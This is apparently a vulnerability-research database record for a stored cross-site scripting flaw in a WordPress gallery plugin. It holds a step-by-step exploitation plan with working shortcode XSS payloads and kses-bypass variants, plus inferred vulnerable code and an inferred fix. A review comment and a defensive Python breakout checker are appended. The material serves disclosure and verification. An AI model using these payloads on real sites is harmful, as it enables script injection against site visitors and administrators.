[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fgrGg2etU_M5AabhFP3KbDSWDM5OMoa2pDwewGQse9ec":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-13612","album-and-image-gallery-plus-lightbox-authenticated-contributor-stored-cross-site-scripting-via-plugins-shortcode","Album and Image Gallery Plus Lightbox \u003C= 2.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Plugin's Shortcode","The Album and Image Gallery plus Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `aigpl-gallery-album` shortcode in all versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","album-and-image-gallery-plus-lightbox",null,"\u003C=2.1.7","2.1.8","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-18 00:00:00","2026-02-19 04:36:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F47cd99ef-d9b0-4be3-8dc4-d7dd56f37c1c?source=api-prod",1,[],"researched",false,3,"This research plan outlines the steps required to demonstrate the Stored Cross-Site Scripting (XSS) vulnerability in the **Album and Image Gallery Plus Lightbox** plugin (version \u003C= 2.1.7) via the `aigpl-gallery-album` shortcode.\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability exists because the plugin registers a shortcode `aigpl-gallery-album` and fails to sanitize or escape user-supplied attributes before outputting them into the HTML of a page. An authenticated user with \"Contributor\" permissions (or higher) can create a post containing this shortcode with a malicious payload in one of its attributes. When any user (including an Administrator) views that post, the script will execute in their browser context.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[aigpl-gallery-album]`\n*   **Vulnerable Attributes (Inferred):** `extra_class`, `id`, `grid`, `title`.\n*   **Authentication Level:** Contributor or above (users who can use the WordPress post editor).\n*   **Endpoint:** `wp-admin\u002Fpost.php` (for saving the post) and the frontend post URL (for triggering).\n*   **Preconditions:** The plugin must be active.\n\n### 3. Code Flow (Inferred)\n1.  
**Registration:** The plugin registers the shortcode in a main class or initialization file (e.g., `includes\u002Fclass-aigpl-shortcode.php` or `includes\u002Fshortcode\u002Faigpl-gallery-album.php`) using `add_shortcode( 'aigpl-gallery-album', 'callback_function' )`.\n2.  **Input Handling:** The callback function receives an `$atts` array. It likely uses `shortcode_atts()` to define defaults but does not validate the values.\n3.  **Output Generation:** The function constructs an HTML string (e.g., a `\u003Cdiv>` wrapper for the gallery). It concatenates attributes like `extra_class` directly into the HTML string without using `esc_attr()`.\n4.  **Sink:** The HTML string is returned and echoed by WordPress during the `the_content` filter execution.\n\n### 4. Nonce Acquisition Strategy\nWhile shortcode execution on the frontend does not require a nonce, **saving the post** that contains the shortcode requires a standard WordPress post nonce (`_wpnonce`).\n\n**For the Automated Agent:**\n1.  **Login:** Use the `browser_navigate` tool to log in as a Contributor.\n2.  **Extract Nonce:**\n    *   Navigate to `wp-admin\u002Fpost-new.php`.\n    *   Use `browser_eval` to extract the `_wpnonce` from the form: \n        `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n    *   This hidden field only exists in the classic editor form. When the block editor is active (the default since WordPress 5.0), `post-new.php` renders no `_wpnonce` input and the post is saved through the REST API (`wp-json\u002Fwp\u002Fv2\u002Fposts`) with a `wp_rest` nonce sent in the `X-WP-Nonce` header, so either run the test site with the Classic Editor plugin or drive the REST endpoint instead of `post.php`.\n3.  **Post ID:** Also extract the `post_ID` hidden field from the same page load. `post-new.php` creates an auto-draft and the `_wpnonce` is bound to it (nonce action `update-post_{post_ID}`), so a nonce taken from one page load is only valid for that `post_ID`.\n\n### 5. Exploitation Strategy\nThe goal is to inject a script that executes when the post is viewed.\n\n**Step-by-Step Plan:**\n\n1.  **Preparation:** Authenticate as a Contributor.\n2.  **Discovery:** Identify the vulnerable attribute by testing common shortcode parameters for this plugin. \n    *   *Primary target:* `extra_class`.\n    *   *Payload:* `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n3.  
**Submission:** Send a POST request to `wp-admin\u002Fpost.php` to save a new post containing the malicious shortcode.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n    *   **Method:** POST\n    *   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n    *   **Parameters:**\n        *   `post_title`: `XSS Test`\n        *   `content`: `[aigpl-gallery-album extra_class='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']`\n        *   `publish`: `Publish` (for a Contributor this button is labelled \"Submit for Review\"; the post is stored with `pending` status, which only the author and users who can edit the post can view, through the preview link, until an Editor or Administrator publishes it).\n        *   `_wpnonce`: `[EXTRACTED_NONCE]`\n        *   `action`: `editpost`\n        *   `post_ID`: `[POST_ID]`\n    *   **Payload caveat:** accounts without the `unfiltered_html` capability (Contributors by default) have `post_content` run through `wp_kses_post()` on save, which removes the `\u003Cscript>` and `\u003C\u002Fscript>` tags and stores only `alert(window.origin)` inside the shortcode. For a Contributor use a payload with no HTML tag, such as the `id` example in section 9: the `onmouseover` handler there only becomes an attribute when the shortcode is rendered, so kses leaves the stored text untouched.\n4.  **Trigger:** Access the preview URL `http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]&preview=true` while logged in as the Contributor; the public permalink returns a 404 until the post is published.\n5.  **Execution:** Use the `browser_navigate` tool to visit the post and check for an alert or a specific DOM change.\n\n### 6. Test Data Setup\n1.  **Plugin:** Ensure `album-and-image-gallery-plus-lightbox` version 2.1.7 is installed and activated.\n2.  **User:** A user with the `contributor` role (e.g., `contributor` \u002F `password`).\n3.  **Content:** No specific existing content is required, as the attacker creates a new post.\n\n### 7. Expected Results\n*   The POST request to save the post should return a `302 Redirect` back to the post's edit screen.\n*   When navigating to the post URL with a payload that was stored unmodified, the HTML source should contain:\n    `\u003Cdiv class=\"... \">\u003Cscript>alert(window.origin)\u003C\u002Fscript>\"> ...`\n*   The browser should execute the `alert()` call.\n\n### 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to confirm the payload is stored in the `wp_posts` table, and whether kses altered it on the way in:\n    `wp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test'\"`\n2.  
**HTML Inspection:** Use the `http_request` tool to fetch the post content and search for the unescaped payload:\n    `http_request(url='http:\u002F\u002Flocalhost:8080\u002F?p=[ID]')`\n    *Verify the presence of the raw `\u003Cscript>` tag within the shortcode's output.*\n    *An unauthenticated request like this only returns the rendered post once it is published; while it is pending, send the Contributor's session cookie and request `\u002F?p=[ID]&preview=true`, otherwise the 404 page contains no shortcode output at all.*\n\n### 9. Alternative Approaches\nIf `extra_class` is not vulnerable, try the following attributes:\n*   `grid`: `[aigpl-gallery-album grid='\">\u003Cimg src=x onerror=alert(1)>']`\n*   `id`: `[aigpl-gallery-album id='1337\" onmouseover=\"alert(1)\"']`\n*   `link_target`: `[aigpl-gallery-album link_target='_blank\" onfocus=\"alert(1)\" autofocus=\"']`\n\nFor a Contributor, only the `id` and `link_target` variants survive saving as written: `wp_kses_post()` reduces the `grid` payload to `\u003Cimg src=\"x\">` (the `onerror` handler is dropped) because it contains an HTML tag, whereas the other two contain none and only become attributes when the shortcode is rendered.\n\nIf the payload is reflected inside a JavaScript block (localization), try breaking out of the JS string:\n*   `[aigpl-gallery-album extra_class=\"';alert(1);\u002F\u002F\"]`","The 'Album and Image Gallery Plus Lightbox' plugin fails to sanitize and escape user-supplied attributes within the [aigpl-gallery-album] shortcode. This allows authenticated users with Contributor-level roles or higher to inject arbitrary JavaScript into a post, which will execute when any user views the content.","\u002F\u002F Inferred from research plan: includes\u002Fshortcode\u002Faigpl-gallery-album.php\nfunction aigpl_gallery_album_shortcode_handler($atts) {\n    $atts = shortcode_atts(array(\n        'id'          => '',\n        'extra_class' => '',\n        'grid'        => '3',\n        'title'       => ''\n    ), $atts);\n\n    \u002F\u002F Vulnerable: Attributes are concatenated into HTML without escaping\n    $html = '\u003Cdiv class=\"aigpl-gallery-album-wrap ' . $atts['extra_class'] . '\" id=\"aigpl-gallery-album-' . $atts['id'] . '\">';\n    $html .= '\u003Ch3 class=\"aigpl-gallery-title\">' . $atts['title'] . 
'\u003C\u002Fh3>';\n    \u002F\u002F ...\n    return $html;\n}","--- a\u002Fincludes\u002Fshortcode\u002Faigpl-gallery-album.php\n+++ b\u002Fincludes\u002Fshortcode\u002Faigpl-gallery-album.php\n@@ -10,7 +10,7 @@\n     ), $atts);\n \n-    $html = '\u003Cdiv class=\"aigpl-gallery-album-wrap ' . $atts['extra_class'] . '\" id=\"aigpl-gallery-album-' . $atts['id'] . '\">';\n+    $html = '\u003Cdiv class=\"aigpl-gallery-album-wrap ' . esc_attr($atts['extra_class']) . '\" id=\"aigpl-gallery-album-' . esc_attr($atts['id']) . '\">';\n-    $html .= '\u003Ch3 class=\"aigpl-gallery-title\">' . $atts['title'] . '\u003C\u002Fh3>';\n+    $html .= '\u003Ch3 class=\"aigpl-gallery-title\">' . esc_html($atts['title']) . '\u003C\u002Fh3>';","The exploit requires Contributor-level authentication or higher to access the post editor. The attacker creates a new post or page and includes the [aigpl-gallery-album] shortcode with a malicious payload in one of its attributes, such as: [aigpl-gallery-album extra_class='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']. 
When the attacker saves the post (as a draft or pending review) and navigates to the post preview or public URL, the unescaped attribute breaks out of the HTML tag's class context and executes the injected JavaScript in the browser of any viewer, including administrators.","gemini-3-flash-preview","2026-04-19 04:29:00","2026-04-19 04:30:58",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.1.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Falbum-and-image-gallery-plus-lightbox\u002Ftags\u002F2.1.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Falbum-and-image-gallery-plus-lightbox.2.1.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Falbum-and-image-gallery-plus-lightbox\u002Ftags\u002F2.1.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Falbum-and-image-gallery-plus-lightbox.2.1.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Falbum-and-image-gallery-plus-lightbox\u002Ftags"]
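Review bot: the inferred fix diff (research_fix_diff) escapes `extra_class`, `id` and `title` but leaves `grid` alone, even though the same `shortcode_atts()` block in research_vulnerable_code declares it and section 9 of the plan lists it as a candidate; if `grid` is echoed anywhere later in the handler it needs the same `esc_attr()` (or `absint()`, since it is numeric) treatment, otherwise the fix is incomplete for that path. Two smaller points: the `@@ -10,7 +10,7 @@` header does not match the four old and four new lines actually shown (two context lines plus two removed/added each), so the hunk needs regenerating before it can be applied; and because the whole diff is labelled as inferred from the research plan rather than taken from the 2.1.8 release, it should be checked against the real change between `tags\u002F2.1.7` and `tags\u002F2.1.8` on plugins.trac.wordpress.org (the `fixed_browse`/`vulnerable_browse` links in source_links) before anyone treats it as the shipped patch.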
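The verification step in section 8 of the research plan (fetch the rendered post and look for the payload) is easy to get wrong by grepping for the raw string: an escaped attribute still contains the payload text, it just never becomes markup. The checker below, an added example that is not code from the plugin, Wordfence or the research plan, parses the page instead and reports whether a shortcode attribute broke out of its attribute context (a new `<script>` element or an `on*` handler attribute) or was neutralised. The wrapper class `aigpl-gallery-album-wrap` and the `id="aigpl-gallery-album-1"` form are taken from the advisory's inferred PHP, not from the 2.1.7 source, and `render_wrapper()` is a model of that inferred sink (vulnerable concatenation versus the `esc_attr()` fix), not the plugin's own code. The two payloads and the 404 page are constructed inputs.

```python
"""Audit a rendered WordPress page for the CVE-2025-13612 sink.

Added example, not code from the plugin, Wordfence or the research plan.
Assumptions (from the advisory's inferred PHP, not from the 2.1.7 release):
the shortcode renders <div class="aigpl-gallery-album-wrap {extra_class}" id="aigpl-gallery-album-{id}">.
"""
from html.parser import HTMLParser
import html

WRAPPER_CLASS = "aigpl-gallery-album-wrap"   # assumed wrapper class from the inferred code


class _SinkAudit(HTMLParser):
    """Collect what an attribute breakout produces: new <script> elements and
    on* event-handler attributes, plus the decoded class value of the wrapper."""

    def __init__(self):
        super().__init__(convert_charrefs=True)   # attribute values come back decoded
        self.findings = []
        self.wrapper_class = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script-element", f"line {self.getpos()[0]}"))
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.findings.append(("event-handler", f"<{tag} {name}={value!r}>"))
            if tag == "div" and name == "class" and value and WRAPPER_CLASS in value:
                self.wrapper_class = value


def audit_shortcode_output(page_html):
    """Return the breakout findings and the wrapper's decoded class attribute."""
    parser = _SinkAudit()
    parser.feed(page_html)
    parser.close()
    return {"findings": parser.findings, "wrapper_class": parser.wrapper_class}


def classify(page_html):
    """'no-wrapper': the shortcode never rendered (a pending post fetched without
    the author's session gives a 404 page); 'breakout': the payload became markup;
    'escaped': the payload survives only as inert attribute text."""
    result = audit_shortcode_output(page_html)
    if result["wrapper_class"] is None:
        return "no-wrapper"
    return "breakout" if result["findings"] else "escaped"


def render_wrapper(extra_class, escape):
    """Model of the inferred sink (not the plugin's PHP). escape=False mirrors the
    2.1.7 concatenation, escape=True the esc_attr() fix; html.escape(quote=True)
    stands in for esc_attr(), which likewise encodes < > & " and the single quote."""
    value = html.escape(extra_class, quote=True) if escape else extra_class
    return (f'<html><body><div class="{WRAPPER_CLASS} {value}" '
            f'id="aigpl-gallery-album-1"><h3 class="aigpl-gallery-title">t</h3>'
            f'</div></body></html>')


# Constructed inputs: the plan's primary payload, a tag-free payload of the kind that
# survives wp_kses_post() for a Contributor, and a stand-in for the 404 page returned
# when a pending post is requested without the author's session.
SCRIPT_PAYLOAD = '"><script>alert(window.origin)</script>'
HANDLER_PAYLOAD = '" onmouseover="alert(1)'
NOT_FOUND_PAGE = "<html><body><h1>Page not found</h1></body></html>"


if __name__ == "__main__":
    for name, payload in (("script", SCRIPT_PAYLOAD), ("handler", HANDLER_PAYLOAD)):
        for escape in (False, True):
            page = render_wrapper(payload, escape)
            print(f"{name:8s} esc_attr={str(escape):5s} -> {classify(page):10s} "
                  f"{audit_shortcode_output(page)['findings']}")
    print("anonymous fetch of pending post ->", classify(NOT_FOUND_PAGE))
```

Feed `classify()` the body of the `http_request` response from section 8: `breakout` confirms the sink, `escaped` is what the fixed version should produce (the class attribute still carries the payload text, which is why a plain string search is misleading), and `no-wrapper` means the shortcode never rendered, which is the symptom of fetching a pending post without the Contributor's cookies rather than evidence of a fix.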